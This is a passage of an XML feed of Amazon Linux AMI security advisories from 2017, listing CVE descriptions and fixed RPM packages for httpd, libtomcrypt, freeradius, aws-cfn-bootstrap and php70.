It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning.
1406822:
CVE-2016-8743 httpd: Apache HTTP Request Parsing Whitespace Defects
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8743" title="" id="CVE-2016-8743" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3167" title="" id="CVE-2017-3167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3169" title="" id="CVE-2017-3169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7659" title="" id="CVE-2017-7659" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7668" title="" id="CVE-2017-7668" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7679" title="" id="CVE-2017-7679" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_ldap" version="2.4.27" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.27" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.27" release="3.71.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.27-3.71.amzn1.noarch.rpm</filename></package><package name="mod24_proxy_html" version="2.4.27" release="3.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.27" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.27" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.27" release="3.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.27" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.27" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.27" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.27" release="3.71.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.27" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.27" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.27" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.27" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.27" release="3.71.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.27" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.27-3.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-864</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-864: medium priority package update for libtommath libtomcrypt</title><issued date="2017-08-03 18:56:00" /><updated date="2017-08-04 00:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6129:
The rsa_verify_hash_ex function in rsa_verify_hash.c in LibTomCrypt, as used in OP-TEE before 2.2.0, does not validate that the message length is equal to the ASN.1 encoded data length, which makes it easier for remote attackers to forge RSA signatures or public certificates by leveraging a Bleichenbacher signature forgery attack.
1370955:
CVE-2016-6129 libtomcrypt: possible OP-TEE Bleichenbacher attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6129" title="" id="CVE-2016-6129" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtomcrypt" version="1.17" release="25.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtomcrypt-1.17-25.4.amzn1.x86_64.rpm</filename></package><package name="libtomcrypt-debuginfo" version="1.17" release="25.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtomcrypt-debuginfo-1.17-25.4.amzn1.x86_64.rpm</filename></package><package name="libtomcrypt-devel" version="1.17" release="25.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtomcrypt-devel-1.17-25.4.amzn1.x86_64.rpm</filename></package><package name="libtomcrypt" version="1.17" release="25.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtomcrypt-1.17-25.4.amzn1.i686.rpm</filename></package><package name="libtomcrypt-debuginfo" version="1.17" release="25.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtomcrypt-debuginfo-1.17-25.4.amzn1.i686.rpm</filename></package><package name="libtomcrypt-devel" version="1.17" release="25.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtomcrypt-devel-1.17-25.4.amzn1.i686.rpm</filename></package><package name="libtommath-debuginfo" version="0.42.0" release="5.3.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtommath-debuginfo-0.42.0-5.3.3.amzn1.x86_64.rpm</filename></package><package name="libtommath" version="0.42.0" release="5.3.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtommath-0.42.0-5.3.3.amzn1.x86_64.rpm</filename></package><package name="libtommath-devel" version="0.42.0" release="5.3.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtommath-devel-0.42.0-5.3.3.amzn1.x86_64.rpm</filename></package><package name="libtommath-debuginfo" version="0.42.0" release="5.3.3.amzn1" epoch="0" arch="i686"><filename>Packages/libtommath-debuginfo-0.42.0-5.3.3.amzn1.i686.rpm</filename></package><package name="libtommath" version="0.42.0" release="5.3.3.amzn1" epoch="0" arch="i686"><filename>Packages/libtommath-0.42.0-5.3.3.amzn1.i686.rpm</filename></package><package name="libtommath-devel" version="0.42.0" release="5.3.3.amzn1" epoch="0" arch="i686"><filename>Packages/libtommath-devel-0.42.0-5.3.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-865</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-865: important priority package update for freeradius</title><issued date="2017-08-03 19:11:00" /><updated date="2017-08-04 00:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10983:
An out-of-bounds read flaw was found in the way FreeRADIUS server handled decoding of DHCP packets. A remote attacker could use this flaw to crash the FreeRADIUS server by sending a specially crafted DHCP request.
1468503:
CVE-2017-10983 freeradius: Out-of-bounds read in fr_dhcp_decode() when decoding option 63
CVE-2017-10982:
An out-of-bounds read flaw was found in the way FreeRADIUS server handles decoding of DHCP packets. A remote attacker could use this flaw to crash the FreeRADIUS server by sending a specially crafted DHCP request.
1468498:
CVE-2017-10982 freeradius: Out-of-bounds read in fr_dhcp_decode_options()
CVE-2017-10981:
A memory leak flaw was found in the way FreeRADIUS server handles decoding of DHCP packets. A remote attacker could use this flaw to cause the FreeRADIUS server to consume an increasing amount of memory resources over time, possibly leading to a crash due to memory exhaustion, by sending specially crafted DHCP packets.
1468495:
CVE-2017-10981 freeradius: Memory leak in fr_dhcp_decode()
CVE-2017-10980:
A memory leak flaw was found in the way FreeRADIUS server handles decoding of DHCP packets. A remote attacker could use this flaw to cause the FreeRADIUS server to consume an increasing amount of memory resources over time possibly leading to a crash due to memory exhaustion.
1468493:
CVE-2017-10980 freeradius: Memory leak in decode_tlv()
CVE-2017-10979:
An out-of-bounds write flaw was found in the way FreeRADIUS server handled certain attributes in request packets. A remote attacker could use this flaw to crash the FreeRADIUS server or to execute arbitrary code in the context of the FreeRADIUS server process by sending a specially crafted request packet.
1468490:
CVE-2017-10979 freeradius: Out-of-bounds write in rad_coalesce()
CVE-2017-10978:
An out-of-bounds read and write flaw was found in the way FreeRADIUS server handled RADIUS packets. A remote attacker could use this flaw to crash the FreeRADIUS server by sending a specially crafted RADIUS packet.
1468487:
CVE-2017-10978 freeradius: Out-of-bounds read/write due to improper output buffer size check in make_secret()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10978" title="" id="CVE-2017-10978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10979" title="" id="CVE-2017-10979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10980" title="" id="CVE-2017-10980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10981" title="" id="CVE-2017-10981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10982" title="" id="CVE-2017-10982" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10983" title="" id="CVE-2017-10983" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freeradius-python" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-python-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-utils" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-utils-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-mysql" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-mysql-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-debuginfo" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-debuginfo-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-perl" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-perl-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-postgresql" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-postgresql-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-unixODBC" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-unixODBC-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-ldap" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-ldap-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-krb5" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-krb5-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-mysql" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-mysql-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-ldap" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-ldap-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-krb5" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-krb5-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-python" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-python-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-unixODBC" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-unixODBC-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-postgresql" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-postgresql-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-debuginfo" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-debuginfo-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-utils" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-utils-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-perl" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-perl-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-2.2.6-7.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-866</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-866: important priority package update for aws-cfn-bootstrap</title><issued date="2017-08-03 19:21:00" /><updated date="2024-01-18 16:30:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="aws-cfn-bootstrap" version="1.4" release="20.12.amzn1" epoch="0" arch="noarch"><filename>Packages/aws-cfn-bootstrap-1.4-20.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-867</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-867: medium priority package update for php70</title><issued date="2017-08-03 20:38:00" /><updated date="2017-08-04 02:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9229:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A SIGSEGV occurs in left_adjust_char_head() during regular expression compilation. Invalid handling of reg-&gt;dmax in forward_search_range() could result in an invalid pointer dereference, normally as an immediate denial-of-service condition.
1466746:
CVE-2017-9229 oniguruma: Invalid pointer dereference in left_adjust_char_head()
CVE-2017-9228:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write occurs in bitset_set_range() during regular expression compilation due to an uninitialized variable from an incorrect state transition. An incorrect state transition in parse_char_class() could create an execution path that leaves a critical local variable uninitialized until it&#039;s used as an index, resulting in an out-of-bounds write memory corruption.
1466740:
CVE-2017-9228 oniguruma: Out-of-bounds heap write in bitset_set_range()
CVE-2017-9227:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in mbc_enc_len() during regular expression searching. Invalid handling of reg-&gt;dmin in forward_search_range() could result in an invalid pointer dereference, as an out-of-bounds read from a stack buffer.
1466739:
CVE-2017-9227 oniguruma: Out-of-bounds stack read in mbc_enc_len() during regular expression searching
CVE-2017-9226:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of &#039;\\700&#039; would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.
1466736:
CVE-2017-9226 oniguruma: Heap buffer overflow in next_state_val() during regular expression compilation
CVE-2017-9224:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.
1466730:
CVE-2017-9224 oniguruma: Out-of-bounds stack read in match_at() during regular expression searching
CVE-2017-7890:
The GIF decoding function gdImageCreateFromGifCtx in gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.31 and 7.x before 7.1.7, does not zero colorMap arrays before use. A specially crafted GIF image could use the uninitialized tables to read ~700 bytes from the top of the stack, potentially disclosing sensitive information.
1473822:
CVE-2017-7890 php: Buffer over-read from unitialized data in gdImageCreateFromGifCtx function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7890" title="" id="CVE-2017-7890" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9224" title="" id="CVE-2017-9224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9226" title="" id="CVE-2017-9226" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9227" title="" id="CVE-2017-9227" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9228" title="" id="CVE-2017-9228" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9229" title="" id="CVE-2017-9229" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-mysqlnd" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.21-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-868</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-868: critical priority package update for kernel</title><issued date="2017-08-10 16:31:00" 